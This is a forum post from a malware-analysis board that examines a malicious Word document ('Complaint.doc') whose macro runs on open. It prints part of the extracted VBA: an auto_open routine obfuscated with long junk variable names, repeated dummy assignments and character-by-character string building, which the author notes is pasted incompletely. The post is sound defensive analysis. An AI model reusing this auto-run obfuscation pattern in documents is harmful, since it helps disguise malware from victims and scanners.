官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 病毒分析 】 『病毒分析区』 文件不落地word宏代码样本分析
123下一页
返回列表 发新帖
查看: 11231|回复: 27
收起左侧

[PC样本分析] 文件不落地word宏代码样本分析

  [复制链接]
hjm666
hjm666 发表于 2019-11-13 12:52
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 hjm666 于 2019-11-13 13:50 编辑

样本信息·:
name:Complaint.doc
 image.png

文件打开预览,只要是office开启并信任了宏,恶意代码会在打开文件时自动运行。
image.png

alt + f 11 利用编辑器查看该文档里的宏代码
image.png
此刻华生发现了盲点。。。
image.png
该完整(不完整)的宏代码,  在添加代码编辑代码复制代码的时候,我后悔了·····页面卡了,我对编辑器说你行的我相信你可以,【两分钟后】编辑器:我···大概或许可能行,我:好了,我不行,我的错·····
[Shell] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Sub auto_open()
Dim cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc As String
Dim cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA As String
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc =
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "o"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "P"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
